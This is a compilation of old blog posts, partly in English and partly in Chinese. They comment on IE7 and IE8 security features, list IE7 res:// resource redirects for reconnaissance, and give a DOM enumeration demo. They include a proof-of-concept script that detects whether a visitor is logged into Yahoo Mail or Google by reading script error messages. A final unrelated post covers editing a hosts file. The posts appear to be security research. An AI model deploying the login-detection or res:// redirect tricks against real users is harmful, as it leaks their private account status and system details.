I had some fun today on Internet Explorer and tested the new IE8 also.
Along, I also compared the new security features to IE7. And there are many
things to say about both versions. Don’t get me started on the usability. To
be honest it looks horrible. Don’t know if you ever noticed it, but
selecting text with your mouse has become a real challenge. It has some
strange selection boundary which results in selecting text you don’t want to
select. Typically Microsoft, onto the security features. You might have
heard or read about a new feature called XDR that allows cross-domain
requests. If not, I’ll explain it here in short detail as well as the other
new features before I’m going into reverse engineering IE7 & IE8.

The XDR object.

xdr = new XDomainRequest();
xdr.open(’POST’, ‘http://www.mr.bigglesworth.com’);
xdr.send(data);
Now, Mr.Bigglesworth needs to approve the send XDomainRequest header, but we
can approve the call by returning this header to the server that requested
legitimacy:
Response.AppendHeader(”XDomainRequestAllowed”,”1″);
Great, XSS made easy. No need for hijacked iframes, css or images. Nope pure
Javascript does the trick for us. This obviously can bypass many XSS filters
in use today, so if you run one be sure to check this beast out. In my
opinion this will broaden the attack landscape since there are more ways of
launching XSS or spreading worms. The XDR object also returns the
responseText that gives access to:
xdr.onerror
xdr.ontimeout
xdr.onprogress
xdr.onload
xdr.timeout
Useful, if you’re into worms and all.
next, I saw that they implemented cross-document messaging in the form of
the object postMessage. Opera already has it, and from a security standpoint
I don’t trust it. It basically means that a webpage can write into another
page that is running in the same session and on the same host by attaching
an event listener. Spoofing comes to mind, and maybe other attacks as well.
The real question is of course: what is it for? I don’t know.
Implementing it is a breeze:
page 1:
var doc = document.getElementsByTagName(’iframe’)[0];
doc.contentWindow.postMessage(’Hello Mr. Bigglesworth!’);
page 2:
document.attachEvent(’onmessage’,function(e) {
if (e.domain == ‘example.com’) {
if (e.data == ‘Hello Mr. Bigglesworth!’) {
e.source.postMessage(’Meow! Meow! Dr. Evil!’);
} else {
alert(e.data);
}
}

});
Hash write access.
Another thing that caught my eye was write access to the hash of an url.
Doesn’t sound smart because I don’t want Javascript to manipulate the hash.
Not only can it be annoying, it can lead to security issues depending on the
setting of your website.

Webslices.

If I understand it correctly this feature allows users to favorite the slice
or put it in their feed reader. Better expect some buffer overflows here
since IE8 now listens for a tag called ‘hslice’ on any page it opens, would
be nice to fuzz this feature.
<div class=”hslice” id=”main”>
<h2 class=”entry-title”>All I want are friggin’ sharks with friggin’ lazer
beams attached to their heads! </h2>
</div>

GlobalStorage & SessionStorage.

IE8 jumped on the Mozilla bandwagon and implemented the Session object. I
can’t say I’m that impressed because I as I said before; allowing 10MB of
data to be stored in such object (XML file in IE8) isn’t smart. Let alone
the permanent storage of user tracking details, XSS worms and other
spy-ware.

IE8 GlobalStorage

<script>
var storage = globalStorage[location.hostname];
storage.some_string = ‘
Ladies and Gentlemen welcome to my underground lair.
I have gathered here before me the worlds deadliest assassins.
And yet each of you has failed to kill Austin powers.
That makes me angry. And when Dr. Evil get angry, Mr. Bigglesworth gets
upset.
And when Mr. Bigglesworth gets upset…people DIE!!!
Why must I be surrounded by freakin idiots. Mustafa, Frau Farbissina…
‘;
</script>

Reverse Engineering IE7 & IE8.

Okay, this is fun. I’m going to show you a couple things I found out about
Internet Explorer. First off IE8 prevents header forwards on files, pity
this was pretty ‘evil’ in MSIE 7 where it is still possible to change the
location of a file to a local file stored on your computer. It’s very
simple:
<?
header(”location: localfile “);
?>
And IE7 follows it, whereas IE8 refuses to follow.
The reason why this is dangerous is because of this XML file that contains
system information which we could parse. Useful for reconnaissance and
possibly other attack schemes.
<?
header(”location: res://ieframe.dll/24/123″);
?>
Results in IE7:
<?xml version=”1.0″ encoding=”UTF-8″ standalone=”yes” ?>
- <!– Copyright (c) Microsoft Corporation
–>
- <assembly xmlns=”urn:schemas-microsoft-com:asm.v1″
xmlns:asmv3=”urn:schemas-microsoft-com:asm.v3″ manifestVersion=”1.0″>
<assemblyIdentity
name=”Microsoft.Windows.InetCore.ieframe”processorArchitecture=”x86″
version=”5.1.0.0″
type=”win32″ />
<description>Windows IE</description>
- <dependency>
- <dependentAssembly>
<assemblyIdentity
type=”win32″name=”Microsoft.Windows.Common-Controls”version=”6.0.0.0″
processorArchitecture=”*”
publicKeyToken=”6595b64144ccf1df” language=”*”
/>
</dependentAssembly>
</dependency>
- <trustInfo xmlns=”urn:schemas-microsoft-com:asm.v3″>
- <security>
- <requestedPrivileges>
<requestedExecutionLevel level=”asInvoker” uiAccess=”false” />
</requestedPrivileges>
</security>
</trustInfo>
- <asmv3:application>
- <asmv3:windowsSettings
xmlns=”http://schemas.microsoft.com/SMI/2005/WindowsSettings“>
<dpiAware>true</dpiAware>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>
If you notice correctly I read res://ieframe.dll/24/123 located on
ieframe.dll which is the IEDataObjectWrapper (InProcServer32) I don’t know
why they still allow this to be browsable, because you can resource it on
iframes, XML and as a Javascript source. So I went further to find all data
object in IE8 and a few in IE7.
IE7/8 data sources are:
res://ieframe.dll/MUI/1

res://ieframe.dll/TYPELIB/1

res://ieframe.dll/UIFILE/{20481,20482,20483,20484,20484,20485,20486,20487,39
216,41555}

res://ieframe.dll/WEVT_TEMPLATE/1

res://ieframe.dll/Version Info/1

res://ieframe.dll/23/ABOUT.js

res://ieframe.dll/23/ANALYZE.js

res://ieframe.dll/23/ANCHBRWS.js

res://ieframe.dll/23/DOCBROWS.js

res://ieframe.dll/23/ERROR.js

res://ieframe.dll/23/HTTPERRORPAGESSCRIPTS.js

res://ieframe.dll/23/IEERROR.js

res://ieframe.dll/23/IMGBROWS.js

res://ieframe.dll/23/INVALIDCERT.js

res://ieframe.dll/23/ORGFAV.js

res://ieframe.dll/23/PHISHSITE.js

res://ieframe.dll/23/POLICY.js

res://ieframe.dll/23/PREVIEW.js

res://ieframe.dll/preview.dlg (dialog)

res://ieframe.dll/23/PSTEMPLATES.js

res://ieframe.dll/24/123 (XML file)
IE6 has a few too:
res://mshtml.dll/REGINST/REGINST

res://mshtml.dll/23/ABOUT.MOZ

res://mshtml.dll/23/BLANK.HTM

res://mshtml.dll/23/REPOST.HTM
As well as others.
These are nice to play with some more, I haven’t digged any deeper yet but
this is quite nice to have a look at. So, enough building blocks to pentest
IE a little further. If you find anything notable, do let me know.

以前写的一小段代码，拿出来共享之，同时备忘

<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.0 Transitional//EN”>
<HTML>
<HEAD>
<TITLE>DOM attributes enumeration POC </TITLE>
<SCRIPT LANGUAGE=“JavaScript”>
<!–

function load_attributes()
{
    var attrs = document.getElementById(“text_id”).attributes;
    var div = document.getElementById(“attrs_div”);
    for(var attr in attrs ){
        div.innerHTML += “<li><a href=’javascript:load_attrib_value(\”“ + attr + “\”)’>”+ attr + “</a></li>”;
    }
}
function load_attrib_value(attrib)
{
    var attrs = document.getElementById(“text_id”).attributes;
    var namedItem = attrs.getNamedItem(attrib);
    if(namedItem)
        alert(attrib + ” = “ + namedItem.value);
    else
        alert(attrib + ” does not specified!”);
}
//–>
</SCRIPT>
</HEAD>

<BODY onload=load_attributes()>
<input id=“text_id” type=“text” value=“text_value” name=“text_box”>
<p>
Text has the following attributes:
<div id=“attrs_div”>
</div>
</BODY>
</HTML>

今天看到一篇有意思的文章，关于用js检测用户是否登入某些Web应用的方法，虽然原文没有给出具体的实现代码，但我经过了一些研究之后，试着写了一段POC，经测试只能在Firefox下使用。IE下的错误信息和Firefox的错误信息接口不一样，暂时没有想到办法利用。

测试地址在这里

附上POC源代码:

<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.0 Transitional//EN”>
<html>
<meta name=”refer” content=”http://kentbrewster.com/patching-privacy-leaks/”>
<head>
<title> JavaScript WebSite Login Checker</title>

</head>

<body>
<script>
<!–
//hook firefox’s onerror event handler
window.onerror = err;

var sites = new Array(2);
sites[’http://mail.yahoo.com/’] = new Array(5);
sites[’http://mail.yahoo.com/’][”name”] = ‘Yahoo Mail (Beta)’;
sites[’http://mail.yahoo.com/’][”login_msg”] = ‘missing } in XML expression’;
sites[’http://mail.yahoo.com/’][”login_line”] = ‘12′;
sites[’http://mail.yahoo.com/’][”logout_msg”] = ’syntax error’;
sites[’http://mail.yahoo.com/’][”logout_line”] = ‘8′;

sites[’https://www.google.com/accounts/ManageAccount’] = new Array(5);
sites[’https://www.google.com/accounts/ManageAccount’][”name”] = ‘Google Account’;
sites[’https://www.google.com/accounts/ManageAccount’][”login_msg”] = ‘XML tag name mismatch (expected a)’;
sites[’https://www.google.com/accounts/ManageAccount’][”login_line”] = ‘144′;
sites[’https://www.google.com/accounts/ManageAccount’][”logout_msg”] = ‘missing = in XML attribute’;
sites[’https://www.google.com/accounts/ManageAccount’][”logout_line”] = ‘35′;

function check(loc) {
var script = document.createElement(’script’);
script.setAttribute(’src’, loc);
script.setAttribute(’type’,'text/javascript’);
var head = document.getElementsByTagName(”head”)[0];
head.appendChild(script);
}

function err(msg, loc, line) {

var res = document.getElementById(sites[loc].name);

if ((msg == sites[loc].login_msg) && (line == sites[loc].login_line)) {
res.innerHTML = ” Logged-in”;
} else if ((msg == sites[loc].logout_msg) && (line == sites[loc].logout_line)) {
res.innerHTML = ” Not Logged-in”;
} else {
res.innerHTML = ” Not Logged-in”;
}
window.stop();
}
// –>
function addSite(loc)
{
var results = document.getElementById(”results”);
var subdiv = document.createElement(”div”);
results.appendChild(subdiv);
var name = document.createElement(”span”);
name.innerHTML = sites[loc].name;
subdiv.appendChild(name);

var result = document.createElement(”span”);
result.setAttribute(”id”, sites[loc].name);
result.innerHTML = ” “;
subdiv.appendChild(result);
var button = document.createElement(”input”);
button.type=”button”;
button.value=”check”;
button.setAttribute(”onclick”,”check(’”+ loc +”‘)”);
subdiv.appendChild(button);
}

</script>
<div align=”center”>
<h1>JavaScript WebSite Login Checker</h1>

<div id=”results”></div>
<script>
for(var i in sites){
addSite(i);
}
</script>
</div>
</body>
</html>

一个多月没有更新自己的blog了，发现水木的blog系统也开始用起了WordPress~

刚用上发现自己以前的一篇文章中的样式表把WordPress的默认模板的样式表命名空间给“污染”了

整个blog首页惨不忍睹。。。

找了一下，删了那篇作怪的文章，总算好了

下面要写的还是水木的问题～～

近一段时间以来，都无法查看水木的图片和所有的附件，所有的版面都是一样。开始以为是浏览器的问题，可是无论是IE 6、IE 7还是FF 2.0，都不好使，这是怎么了呢？

无奈中查看了一下附件的链接地址，哦，att.newsmth.net

ping一下试试，居然是无法解析域名!

原来如此，看来是学校的DNS服务器不行，赖不得水木。

自己解决，用了一个在线的网络工具，前一段时间做PenTest的时候经常用到的，堪称是信息收集必备的瑞士军刀！http://www.robtex.com/

提交查询 att.newsmth.net

返回解析结果如下：

att.newsmth.net CNAME att.k.newsmth.net 60.2.251.13

好了，有了IP就好办了

修改C:\WINDOWS\system32\drivers\etc\下的hosts文件，添加如下记录到该文件：

60.2.251.13 att.newsmth.net
60.2.251.13 newsmth.net
60.2.251.13 trojanjason.mysmth.net

保存后，再ping，果然就ok了，域名解析成功了！

hoho，又可以看图了，哈哈

b.t.w：刚才在写这篇文章的时候，FF居然崩溃了，幸好WordPress有自动保存的功能（这点比老水木blog系统强太多了），要不然就前功尽弃了。

好了，就写到这里了，以后再慢慢发掘WordPress的强大功能！